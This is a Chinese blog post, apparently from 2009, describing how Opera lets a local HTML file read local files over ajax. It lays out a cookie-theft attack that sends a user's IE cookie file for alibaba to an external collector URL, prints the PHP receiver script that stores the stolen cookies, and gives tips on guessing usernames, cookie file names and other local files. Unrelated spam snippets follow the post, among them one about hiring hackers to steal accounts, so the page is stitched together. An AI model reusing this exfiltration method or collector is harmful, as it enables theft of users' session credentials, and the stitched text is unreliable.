空虚浪子心 这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。ff3没有这个漏洞。不废话,看代码吧。利用方式如下:这段代码保存为本地htm文件,然后使用opera打开。将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php a.htm 代码 a.php代码: a.php 代码 <?php $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"]; $fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb"); fwrite($fp,$_GET["cookie"]); fclose($fp); ?> a.php会按照 IP+时间+cookie.txt 格式生成一个txt文件。例如:121.0.29.2252009-01-05 11:55:02cookie.txt里面保存着administrator@alibaba[1].txt的内容。几点说明:1,cookie文件是IE的,比较XX,但是有很多人都会IE和opera混用。2,必须预测本地用户名,不过很多人都是administrator。3,必须预测cookie文件名。这个可以取一些常用网站的,反正ajax是异步,你可以同时调用几个 *** 。4,或者你可以发送任何本地TXT文件。opera可能说这是特性?不知道了,反正FF3没这个漏洞,使用这种方式会报错访问拒绝。
尽管现在越来越多的投资者开始进入股票配资范畴,可是并不是每一位投资者都合适做股票配资的,不合适的负面要素会限制投资者的操作。今日保利配资平台要谈的便是其间的一个要素,仓位办理。仓位办理的状况可以反映出...
本文导读目录: 1、黑客级别分为几级? 2、计算机过几级就是黑客 3、某省高考查分网站被黑客攻击,属于等级保护第几级 4、黑客最高级别最多少 5、黑客级别的化分 6、黑客分为哪几个...
算命婚姻(传统八字算命论婚姻) 乾造吉編 男財為妻, 日支為妻星; 月為婚姻宮, 日為配偶宮 日下坐財, 主妻多內助, 更得妻而發財。 日坐財星, 妻持家有方。 日坐財星又是將星, 定娶...
妈妈都很爱爱干净,在给宝宝洗澡的时候也会注意让给宝宝洗的很干净,让宝宝远离细菌。给宝宝洗澡病并不是洗的越多越干净越好,有时反而会使伤害宝宝的抵抗力。那么该如何给宝宝洗澡呢,下面友谊长存小编就来说一说。...
找黑客盗人号相关问题 都市之我有黑客人格相关问题 我7电脑被黑客锁了没有qq怎么办 网赌退钱方法可靠吗(北京注会退钱)...
MP3是一种音频压缩技术性,其全名是动态性影象权威专家缩小规范声频方面3(Moving Picture Experts Group Audio Layer III),通称为MP3。它被设计方案用于大...